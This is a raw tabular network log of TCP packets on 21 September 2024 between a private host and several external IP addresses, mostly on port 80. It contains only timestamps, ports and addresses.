Sep 21, 2024 14:48:10.473514080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473526955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473530054 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473539114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473560095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473582029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473916054 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473928928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473939896 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473951101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473958015 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473963976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473977089 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473985910 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474014044 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474034071 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474047899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474056005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474067926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474080086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474087000 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474091053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474101067 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474104881 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474118948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474131107 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474132061 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474143028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474159956 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474178076 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474395037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474407911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474419117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474431038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474442005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474450111 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474453926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474466085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474468946 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474478960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474482059 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474490881 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474502087 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474510908 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474513054 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474525928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474539042 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474545002 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.474554062 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474560976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474570990 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474581957 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474582911 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.474594116 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474606037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474617958 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474630117 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474633932 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474633932 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474646091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474647045 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474658966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474669933 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474680901 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474690914 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474693060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474705935 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474711895 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474719048 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474730015 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474740982 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474742889 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474752903 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474764109 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474764109 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474780083 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474791050 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474797010 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474802971 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474816084 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474822998 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474828959 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.474838972 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474839926 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.474852085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.474853039 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474864960 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.474875927 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.474880934 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.474888086 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.474900007 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.474908113 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.474945068 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475272894 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475286007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475296021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475308895 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475321054 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475331068 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475338936 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475342035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475363016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475364923 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475374937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475389004 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475393057 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475404024 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475408077 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475414991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475426912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475431919 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475438118 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475449085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475461006 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475480080 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475502968 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475688934 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475701094 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475711107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475723028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475733995 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475745916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475756884 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475768089 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475769043 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475774050 CEST	443	49725	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:10.475779057 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475790977 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475800991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475800991 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475805998 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475811005 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475816011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475816965 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475822926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475841999 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475856066 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475863934 CEST	49725	443	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:10.475864887 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475871086 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475878000 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475888968 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475889921 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475899935 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475912094 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475915909 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475922108 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475933075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475944042 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475948095 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475956917 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475960016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475970030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475975037 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.475980997 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.475992918 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476001978 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476003885 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476016045 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476027966 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476030111 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476042032 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476047993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476053953 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476066113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476073980 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476077080 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476089954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476100922 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476102114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476115942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476118088 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476125956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476139069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476145983 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476149082 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476160049 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476170063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476172924 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476192951 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476207972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476663113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476675034 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476686954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476699114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476708889 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476713896 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476721048 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476723909 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476732016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476742983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476754904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476758957 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476767063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476768017 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476778030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476800919 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476800919 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476805925 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476819038 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.476829052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476835012 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476840019 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476852894 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476854086 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476875067 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.476876974 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.476902008 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.476902962 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476917028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476927042 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476938963 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476942062 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.476950884 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476963043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.476969004 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.476994038 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477010965 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477044106 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477056026 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477066040 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477077961 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477087975 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477092028 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477101088 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477117062 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477121115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477128983 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477140903 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477140903 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477153063 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477166891 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477174997 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477186918 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477196932 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477207899 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477210999 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477220058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477231026 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477240086 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477247000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477258921 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477260113 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477274895 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477283001 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477287054 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477298975 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477298975 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477310896 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477323055 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477325916 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477334976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477346897 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477355003 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477360010 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477371931 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477374077 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477385044 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477396965 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477400064 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477408886 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477416039 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477427006 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477428913 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477441072 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477447987 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477453947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477467060 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477483988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477507114 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477850914 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477864027 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477874994 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477886915 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477897882 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477897882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477927923 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477933884 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477947950 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477958918 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477969885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477974892 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.477982998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.477994919 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478007078 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478025913 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478045940 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478066921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478080034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478090048 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478137016 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478214025 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478225946 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478236914 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478240967 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478249073 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478255987 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478260994 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478270054 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478276014 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478287935 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478298903 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478300095 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478319883 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478323936 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478336096 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478346109 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478347063 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478360891 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478372097 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478373051 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478388071 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.478389978 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478399992 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478410959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478415966 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478424072 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478435040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478446007 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478449106 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.478450060 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.478457928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478462934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.478477955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478487015 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.478492975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.478499889 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.478503942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478517056 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478526115 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.478528023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478539944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478549004 CEST	49712	80	192.168.2.9	103.130.147.211
